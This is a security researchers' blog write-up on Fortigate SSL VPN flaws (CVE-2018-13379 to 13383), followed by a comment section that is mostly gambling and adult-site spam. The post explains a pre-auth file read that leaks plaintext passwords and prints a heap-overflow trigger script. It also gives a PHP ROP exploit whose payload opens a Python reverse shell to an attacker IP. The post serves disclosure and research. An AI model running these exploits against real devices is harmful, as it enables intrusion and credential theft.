2019年8月10日 星期六

Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN

Author: Meh Chang(@mehqq_) and Orange Tsai(@orange_8361)
This is also the cross-post blog from DEVCORE

Last month, we talked about Palo Alto Networks GlobalProtect RCE as an appetizer. Today, here comes the main dish! If you cannot go to Black Hat or DEFCON for our talk, or you are interested in more details, here is the slides for you!

We will also give a speech at the following conferences, just come and find us!

  • HITCON - Aug. 23 @ Taipei (Chinese)
  • HITB GSEC - Aug. 29,30 @ Singapore
  • RomHack - Sep. 28 @ Rome
  • and more …

Let’s start!

The story began in last August, when we started a new research project on SSL VPN. Compare to the site-to-site VPN such as the IPSEC and PPTP, SSL VPN is more easy to use and compatible with any network environments. For its convenience, SSL VPN becomes the most popular remote access way for enterprise!

However, what if this trusted equipment is insecure? It is an important corporate asset but a blind spot of corporation. According to our survey on Fortune 500, the Top-3 SSL VPN vendors dominate about 75% market share. The diversity of SSL VPN is narrow. Therefore, once we find a critical vulnerability on the leading SSL VPN, the impact is huge. There is no way to stop us because SSL VPN must be exposed to the internet.

At the beginning of our research, we made a little survey on the CVE amount of leading SSL VPN vendors:

It seems like Fortinet and Pulse Secure are the most secure ones. Is that true? As a myth buster, we took on this challenge and started hacking Fortinet and Pulse Secure! This story is about hacking Fortigate SSL VPN. The next article is going to be about Pulse Secure, which is the most splendid one! Stay tuned!

Fortigate SSL VPN

Fortinet calls their SSL VPN product line as Fortigate SSL VPN, which is prevalent among end users and medium-sized enterprise. There are more than 480k servers operating on the internet and is common in Asia and Europe. We can identify it from the URL /remote/login. Here is the technical feature of Fortigate:

  • All-in-one binary

    We started our research from the file system. We tried to list the binaries in /bin/ and found there are all symbolic links, pointing to /bin/init. Just like this:

    Fortigate compiles all the programs and configurations into a single binary, which makes the init really huge. It contains thousands of functions and there is no symbol! It only contains necessary programs for the SSL VPN, so the environment is really inconvenient for hackers. For example, there is even no /bin/ls or /bin/cat!

  • Web daemon

    There are 2 web interfaces running on the Fortigate. One is for the admin interface, handled with /bin/httpsd on the port 443. The other is normal user interface, handled with /bin/sslvpnd on the port 4433 by default. Generally, the admin page should be restricted from the internet, so we can only access the user interface.

    Through our investigation, we found the web server is modified from apache, but it is the apache from 2002. Apparently they modified apache in 2002 and added their own additional functionality. We can map the source code of apache to speed up our analysis.

    In both web service, they also compiled their own apache modules into the binary to handle each URL path. We can find a table specifying the handlers and dig into them!

  • WebVPN

    WebVPN is a convenient proxy feature which allows us connect to all the services simply through a browser. It supports many protocols, like HTTP, FTP, RDP. It can also handle various web resources, such as WebSocket and Flash. To process a website correctly, it parses the HTML and rewrites all the URLs for us. This involves heavy string operation, which is prone to memory bugs.


We found several vulnerabilities:

CVE-2018-13379: Pre-auth arbitrary file reading

While fetching corresponding language file, it builds the json file path with the parameter lang:

snprintf(s, 0x40, "/migadmin/lang/%s.json", lang);
There is no protection, but a file extension appended automatically. It seems like we can only read json file. However, actually we can abuse the feature of snprintf. According to the man page, it writes at most size-1 into the output string. Therefore, we only need to make it exceed the buffer size and the .json will be stripped. Then we can read whatever we want.

CVE-2018-13380: Pre-auth XSS

There are several XSS:


CVE-2018-13381: Pre-auth heap overflow

While encoding HTML entities code, there are 2 stages. The server first calculate the required buffer length for encoded string. Then it encode into the buffer. In the calculation stage, for example, encode string for < is &#60; and this should occupies 5 bytes. If it encounter anything starts with &#, such as &#60;, it consider there is a token already encoded, and count its length directly. Like this:

c = token[idx];
if (c == '(' || c == ')' || c == '#' || c == '<' || c == '>')
    cnt += 5;
else if(c == '&' && html[idx+1] == '#')
    cnt += len(strchr(html[idx], ';')-idx);
However, there is an inconsistency between length calculation and encoding process. The encode part does not handle that much.

switch (c)
    case '<':
        memcpy(buf[counter], "&#60;", 5);
        counter += 4;
    case '>':
    // ...
        buf[counter] = c;
If we input a malicious string like &#<<<;, the < is still encoded into &#60;, so the result should be &#&#60;&#60;&#60;;! This is much longer than the expected length 6 bytes, so it leads to a heap overflow.


import requests

data = {
    'title': 'x', 
    'msg': '&#' + '<'*(0x20000) + ';<', 
r = requests.post('https://sslvpn:4433/message', data=data)

CVE-2018-13382: The magic backdoor

In the login page, we found a special parameter called magic. Once the parameter meets a hardcoded string, we can modify any user’s password.

According to our survey, there are still plenty of Fortigate SSL VPN lack of patch. Therefore, considering its severity, we will not disclose the magic string. However, this vulnerability has been reproduced by the researcher from CodeWhite. It is surely that other attackers will exploit this vulnerability soon! Please update your Fortigate ASAP!

CVE-2018-13383: Post-auth heap overflow

This is a vulnerability on the WebVPN feature. While parsing JavaScript in the HTML, it tries to copy content into a buffer with the following code:

memcpy(buffer, js_buf, js_buf_len);
The buffer size is fixed to 0x2000, but the input string is unlimited. Therefore, here is a heap overflow. It is worth to note that this vulnerability can overflow Null byte, which is useful in our exploitation.

To trigger this overflow, we need to put our exploit on an HTTP server, and then ask the SSL VPN to proxy our exploit as a normal user.


The official advisory described no RCE risk at first. Actually, it was a misunderstanding. We will show you how to exploit from the user login interface without authentication.


Our first attempt is exploiting the pre-auth heap overflow. However, there is a fundamental defect of this vulnerability – It does not overflow Null bytes. In general, this is not a serious problem. The heap exploitation techniques nowadays should overcome this. However, we found it a disaster doing heap feng shui on Fortigate. There are several obstacles, making the heap unstable and hard to be controlled.

  • Single thread, single process, single allocator
    The web daemon handles multiple connection with epoll(), no multi-process or multi-thread, and the main process and libraries use the same heap, called JeMalloc. It means, all the memory allocations from all the operations of all the connections are on the same heap. Therefore, the heap is really messy.
  • Operations regularly triggered
    This interferes the heap but is uncontrollable. We cannot arrange the heap carefully because it would be destroyed.
  • Apache additional memory management.
    The memory won’t be free() until the connection ends. We cannot arrange the heap in a single connection. Actually this can be an effective mitigation for heap vulnerabilities especially for use-after-free.
  • JeMalloc
    JeMalloc isolates meta data and user data, so it is hard to modify meta data and play with the heap management. Moreover, it centralizes small objects, which also limits our exploit.
We were stuck here, and then we chose to try another way. If anyone exploits this successfully, please teach us!

CVE-2018-13379 + CVE-2018-13383

This is a combination of pre-auth file reading and post-auth heap overflow. One for gaining authentication and one for getting a shell.

  • Gain authentication

    We first use CVE-2018-13379 to leak the session file. The session file contains valuable information, such as username and plaintext password, which let us login easily.

  • Get the shell

    After login, we can ask the SSL VPN to proxy the exploit on our malicious HTTP server, and then trigger the heap overflow.

    Due to the problems mentioned above, we need a nice target to overflow. We cannot control the heap carefully, but maybe we can find something regularly appears! It would be great if it is everywhere, and every time we trigger the bug, we can overflow it easily! However, it is a hard work to find such a target from this huge program, so we were stuck at that time … and we started to fuzz the server, trying to get something useful.

    We got an interesting crash. To our great surprise, we almost control the program counter!

    Here is the crash, and that’s why we love fuzzing! ;)

    Program received signal SIGSEGV, Segmentation fault.
    0x00007fb908d12a77 in SSL_do_handshake () from /fortidev4-x86_64/lib/libssl.so.1.1
    2: /x $rax = 0x41414141
    1: x/i $pc
    => 0x7fb908d12a77 <SSL_do_handshake+23>: callq *0x60(%rax)
    The crash happened in SSL_do_handshake()

    int SSL_do_handshake(SSL *s)
        // ...
        s->method->ssl_renegotiate_check(s, 0);
        if (SSL_in_init(s) || SSL_in_before(s)) {
            if ((s->mode & SSL_MODE_ASYNC) && ASYNC_get_current_job() == NULL) {
                struct ssl_async_args args;
                args.s = s;
                ret = ssl_start_async_job(s, &args, ssl_do_handshake_intern);
            } else {
                ret = s->handshake_func(s);
        return ret;
    We overwrote the function table inside struct SSL called method, so when the program trying to execute s->method->ssl_renegotiate_check(s, 0);, it crashed.

    This is actually an ideal target of our exploit! The allocation of struct SSL can be triggered easily, and the size is just close to our JaveScript buffer, so it can be nearby our buffer with a regular offset! According to the code, we can see that ret = s->handshake_func(s); calls a function pointer, which a perfect choice to control the program flow. With this finding, our exploit strategy is clear.

    We first spray the heap with SSL structure with lots of normal requests, and then overflow the SSL structure.

    Here we put our php PoC on an HTTP server:

        function p64($address) {
            $low = $address & 0xffffffff;
            $high = $address >> 32 & 0xffffffff;
            return pack("II", $low, $high);
        $junk = 0x4141414141414141;
        $nop_func = 0x32FC078;
        $gadget  = p64($junk);
        $gadget .= p64($nop_func - 0x60);
        $gadget .= p64($junk);
        $gadget .= p64(0x110FA1A); // # start here # pop r13 ; pop r14 ; pop rbp ; ret ;
        $gadget .= p64($junk);
        $gadget .= p64($junk);
        $gadget .= p64(0x110fa15); // push rbx ; or byte [rbx+0x41], bl ; pop rsp ; pop r13 ; pop r14 ; pop rbp ; ret ;
        $gadget .= p64(0x1bed1f6); // pop rax ; ret ;
        $gadget .= p64(0x58);
        $gadget .= p64(0x04410f6); // add rdi, rax ; mov eax, dword [rdi] ; ret  ;
        $gadget .= p64(0x1366639); // call system ;
        $gadget .= "python -c 'import socket,sys,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((sys.argv[1],12345));[os.dup2(s.fileno(),x) for x in range(3)];os.system(sys.argv[2]);' xx.xxx.xx.xx /bin/sh;";
        $p  = str_repeat('AAAAAAAA', 1024+512-4); // offset
        $p .= $gadget;
        $p .= str_repeat('A', 0x1000 - strlen($gadget));
        $p .= $gadget;
    <a href="javascript:void(0);<?=$p;?>">xxx</a>
    The PoC can be divided into three parts.

    1. Fake SSL structure

      The SSL structure has a regular offset to our buffer, so we can forge it precisely. In order to avoid the crash, we set the method to a place containing a void function pointer. The parameter at this time is SSL structure itself s. However, there is only 8 bytes ahead of method. We cannot simply call system("/bin/sh"); on the HTTP server, so this is not enough for our reverse shell command. Thanks to the huge binary, it is easy to find ROP gadgets. We found one useful for stack pivot:

      push rbx ; or byte [rbx+0x41], bl ; pop rsp ; pop r13 ; pop r14 ; pop rbp ; ret ;
      So we set the handshake_func to this gadget, move the rsp to our SSL structure, and do further ROP attack.

    2. ROP chain

      The ROP chain here is simple. We slightly move the rdi forward so there is enough space for our reverse shell command.

    3. Overflow string

      Finally, we concatenates the overflow padding and exploit. Once we overflow an SSL structure, we get a shell.

    Our exploit requires multiple attempts because we may overflow something important and make the program crash prior to the SSL_do_handshake. Anyway, the exploit is still stable thanks to the reliable watchdog of Fortigate. It only takes 1~2 minutes to get a reverse shell back.



  • 11 December, 2018 Reported to Fortinet
  • 19 March, 2019 All fix scheduled
  • 24 May, 2019 All advisory released


Upgrade to FortiOS 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above.

66 則留言:

  1. the attack method looks like UAF vulnerabilities!

  2. 哈嘍 你好 orange團隊
    我的 telegram 是 @yyue819
    或者skype也是 yyue819

    hello orange team
    May I ask if you can conduct website security inspection
    We have several websites here that need to be tested for security
    The pay can be anywhere from $8 0000to $150000 per month, or depending on the unit
    The compensation can be more, and it can be discussed in detail,
    my telegram is @yyue819 and skype is yyue819
    If you are interested, please contact me. Thank you

    Sincerely look forward to cooperation and common development with you,and make money

  3. 作者已經移除這則留言。

  4. Hi,
    Thank for your sharing awesome blog. I have some questions while learning and trying to reproduce these exploits.

    How could you get bash shell in fortigate vm ?
    How could you successfully enable Web portal VPN SSL in fortigate vm ? As I know fortigate vm only support low encryption.


  5. I am happy to find your distinguished way of writing the post. Now you make it easy for me to understand and implement the concept. Thank you for the post. 사설토토

  6. I am happy to find your distinguished way of writing the post. Now you make it easy for me to understand and implement the concept. Thank you for the post. 카지노

  7. You have a genuine capacity for composing exceptional substance. I like how you think and the way you speak to your perspectives in this article. I concur with your state of mind. Much obliged to you for sharing. 파워볼

  8. An obligation of appreciation is all together for the better than average blog. It was amazingly useful for me. I m playful I found this blog. Thankful to you for offering to us, I too reliably increase some new helpful learning from your post. 온라인카지노

  9. What’s up to every one, the contents existing at this web page are truly remarkable
    for people knowledge, well, keep up the good work fellows.

  10. Wonderful, what a blog it is! This weblog gives useful facts to us, keep it up 카지노

  11. Pretty! This was an extremely wonderful post. Thank you for providing this info 토토사이트

  12. I like the helpful info you provide in your articles. I’ll bookmark your blog and check again here frequently. I’m quite sure I’ll learn plenty of new stuff right here! Good luck for the next. 먹튀검증업체

  13. Fantastic work! This really can be the kind of data which needs to really be shared round the internet. Shame on Google for perhaps not placement this specific informative article much higher!


  14. Easily, the article is actually the best topic on this registry related issue. I fit in with your conclusions and will eagerly look forward to your next updates

  15. Great blog here! Additionally your website quite a bit up very fast! What web host are you the use of? Can I am getting your affiliate hyperlink on your host? 일본야동

  16. magnificent put up, very informative. I'm wondering why the opposite experts of this sector don't notice this. You must continue your writing. I am confident, you have a huge readers' base already! Feel free to visit my website; 야동

  17. Very great post. I just stumbled upon your blog and wanted to say that I have truly loved browsing your blog posts. In any case I will be subscribing on your feed and I hope you write again very soon! Feel free to visit my website;

  18. Such an amazing and helpful post this is. I really really love it. It’s so good and so awesome. I am just amazed. I hope that you continue to do your work like this in the future also.


  19. So good indeed! Glad to have found your page!! This is such great work!! Interesting to read for sure!! 홀덤

  20. I hope you can help me. I've been thinking about this for a long time, but I'm not getting it resolved.꽁머니

  21. I finally found what I was looking for! I'm so happy. 안전한놀이터 Your article is what I've been looking for for a long time. I'm happy to find you like this. Could you visit my website if you have time? I'm sure you'll find a post of interest that you'll find interesting.

  22. Hard to ignore such an amazing article like this. You really amazed me with your writing talent. Thank for you shared again.


  23. I like your all post. You have done really good work. Thank you for the information you provide, it helped me a lot 파워볼 하는법

  24. I have been looking for articles on these topics for a long time. 카지노사이트 I don't know how grateful you are for posting on this topic. Thank you for the numerous articles on this site, I will subscribe to those links in my bookmarks and visit them often. Have a nice day.

  25. Wonderful web site. Plenty of useful info here. I am sending it to several pals ans additionally sharing. 바카라사이트

  26. This is my first visit to your blog! We are a team of volunteers and starting a new initiative in a community in the same niche. Your blog provided us beneficial information to work on. 카지노사이트존

  27. Great goods from you. I have understand your stuff previous to and you’re just too fantastic. I really like what you have acquired here, certainly like what you are saying and the way in which you say it. You make it enjoyable and you still care for to keep it sensible. 파칭코

  28. An intriguing discussion may be worth comment. I’m sure you should write much more about this topic, may well be described as a taboo subject but generally folks are too little to chat on such topics. An additional. Cheers 토토사이트

  29. Thanks for informative post. This post has helped me save many hours of browsing other similar posts just to find what I was looking for. I’m going to bookmark this post.

  30. 우리카지노2021年12月17日 下午4:42

    When I read an article on this topic, 우리카지노 the first thought was profound and difficult, and I wondered if others could understand.. My site has a discussion board for articles and photos similar to this topic. Could you please visit me when you have time to discuss this topic?

  31. From one day, I noticed that many people post a lot of articles related to 온라인슬롯. Among them, I think your article is the best among them!!I

  32. The wireless and wired models require drivers and software; therefore, each has to undergo one important installation process. If your printer model isn’t set up yet, you can get started now.
    http //ij.start.canon,
    https //ij.start.cannon,

  33. This is the post I was looking for roulette I am very happy to finally read about the Thank you very much. Your post was of great help to me. If you are interested in the column I wrote, please visit my site .

  34. I’m thinking some of my readers might find a bit of this interesting. Do you mind if I post a clip from this and link back? Thanks 사설토토

  35. As I am looking at your writing, 파워볼사이트 I regret being unable to do outdoor activities due to Corona 19, and I miss my old daily life. If you also miss the daily life of those days, would you please visit my site once? My site is a site where I post about photos and daily life when I was free.

  36. Canon.com/ijsetup Setup delivers amazing printing quality. Simply click on know more to get the complete information of the Canon Pixma Setup.

  37. Thank you for some other informative blog. Where else could I get that type of information written in such an ideal means? I have a mission that I’m just now working on, and I have been at the look out for such information. 먹튀검증 It helped me a lot. If you have time, I hope you come to my site and share your opinions. Have a nice day.

  38. I came to this site with the introduction of a friend around me and I was very impressed when I found your writing. I'll come back often after bookmarking! casino trực tuyến

  39. Extremely decent blog and articles. I am realy extremely glad to visit your blog. Presently I am discovered which I really need. I check your blog regular and attempt to take in something from your blog. Much obliged to you and sitting tight for your new post.메이저사이트모음

  40. As I am looking at your writing, 온카지노 I regret being unable to do outdoor activities due to Corona 19, and I miss my old daily life. If you also miss the daily life of those days, would you please visit my site once? My site is a site where I post about photos and daily life when I was free.

  41. 바카라사이트2022年1月8日 下午2:29

    This is a very impressive subject. Thank you for always. I have been reading your article interestingly. If possible, please visit my website to read my posts and leave comments. Have a nice day! 바카라사이트 What you wrote was very helpful to me. Thank you. Actually, I run a site similar to you. If you have time, could you visit my site? Please leave your comments after reading what I wrote. If you do so, I will actively reflect your opinion. I think it will be a great help to run my site. Have a good day.

  42. I like the valuable information you provide in your articles.
    I’ll bookmark your weblog and check again here frequently.
    I am quite certain I’ll learn many new stuff right
    here! Good luck for the next! เว็บแทงบอล

  43. Your post is very interesting to me. Reading was so much fun. I think the reason reading is fun is because it is a post related to that I am interested in. Articles related to 온카지노 you are the best. I would like you to write a similar post about !

  44. Hello, I am one of the most impressed people in your article. 토토사이트순위 I'm very curious about how you write such a good article. Are you an expert on this subject? I think so. Thank you again for allowing me to read these posts, and have a nice day today. Thank you.

  45. William Alexander Elliot was a Lieut Commander on board the HMS Mashona when he died. He has been based in Shanghai from 1923 and signed up in Hong Kong when war started. The Mashona was sunk in May 1941 by the Luftwaffe.

  46. Hello ! I am the one who writes posts on these topics카지노사이트 I would like to write an article based on your article. When can I ask for a review?

  47. I think a lot of articles related to are disappearing someday. That's why it's very hard to find, but I'm very fortunate to read your writing. When you come to my site, I have collected articles related to 크레이지슬롯 .

  48. Why couldn't I have the same or similar opinions as you? T^T I hope you also visit my blog and give us a good opinion. 안전놀이터


  49. Read Newspaper Online list sorted by Countries and by languages. A huge collection of newspaper or epapers online from all over the world in various languages. Epaper hub contains Print edition epaper that you read Online and grab your news through internet. Here you can find any number of epaper in different language, from different cities, different countries and cities. So don’t wait and search you daily newspaper and enjoy news from all over the world online.

  50. As the Internet develops further in the future, I think we need to collect materials that people might be interested in. Among the data to be collected, your 메가슬롯 will also be included.

  51. Thank you for sharing this website. It is very useful and valuable. I like your website very much.
    igoal88 คาสิโน

  52. Your article was very impressive to me. It was unexpected information,but after reading it like this 온카지노, I found it very interesting.

  53. Hello! Nice to meet you, I say . The name of the community I run is 메리트카지노 , and the community I run contains articles similar to your blog. If you have time, I would be very grateful if you visit my site .

  54. I do agree with all of the ideas you’ve presented in your post. They are very convincing and will definitely work. Still, the posts are very short for beginners. Could you please extend them a bit from next time? Thanks for the post. ufabet

  55. Hello, I'm happy to see some great articles on your site. Would you like to come to my site later? My site also has posts, comments and communities similar to yours. Please visit and take a look 메이저놀이터

  56. I no uncertainty esteeming each and every bit of it. It is an amazing site and superior to anything normal give. I need to grateful. Marvelous work! Every one of you complete an unfathomable blog, and have some extraordinary substance. Keep doing stunning 메이저사이트순위

  57. you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa buat logo murah